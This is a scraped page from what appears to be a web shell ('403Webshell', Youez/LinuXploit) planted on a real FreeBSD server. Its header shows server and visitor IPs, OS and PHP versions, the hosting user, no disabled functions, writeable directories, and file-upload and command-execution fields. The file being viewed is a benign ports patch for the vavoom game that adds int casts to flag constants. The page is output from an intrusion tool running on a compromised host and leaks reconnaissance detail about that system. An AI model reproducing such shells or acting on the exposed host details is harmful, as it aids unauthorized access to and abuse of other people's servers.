403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/games/vavoom/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/games/vavoom/files/patch-source_vc__dehacked.cpp
--- source/vc_dehacked.cpp.orig	2017-06-04 08:35:41.777968000 +0200
+++ source/vc_dehacked.cpp	2017-06-04 09:13:52.864992000 +0200
@@ -128,8 +128,8 @@
 	{ 0, "TRANSLUC75", 0x20000000 },
 	{ 0, "STEALTH", 0x40000000 },
 	{ 0, "UNUSED4", 0x40000000 },
-	{ 0, "TRANSLUCENT", 0x80000000 },
-	{ 0, "TRANSLUC50", 0x80000000 },
+	{ 0, "TRANSLUCENT", (int)0x80000000 },
+	{ 0, "TRANSLUC50", (int)0x80000000 },
 	{ 1, "LOGRAV", 0x00000001 },
 	{ 1, "WINDTHRUST", 0x00000002 },
 	{ 1, "FLOORBOUNCE", 0x00000004 },
@@ -161,7 +161,7 @@
 	{ 1, "DORMANT", 0x10000000 },
 	{ 1, "ICEDAMAGE", 0x20000000 },
 	{ 1, "SEEKERMISSILE", 0x40000000 },
-	{ 1, "REFLECTIVE", 0x80000000 },
+	{ 1, "REFLECTIVE", (int)0x80000000 },
 	//	Ignored flags
 	{ 0, "SLIDE", 0 },
 	{ 0, "UNUSED2", 0 },

Youez - 2016 - github.com/yon3zu
LinuXploit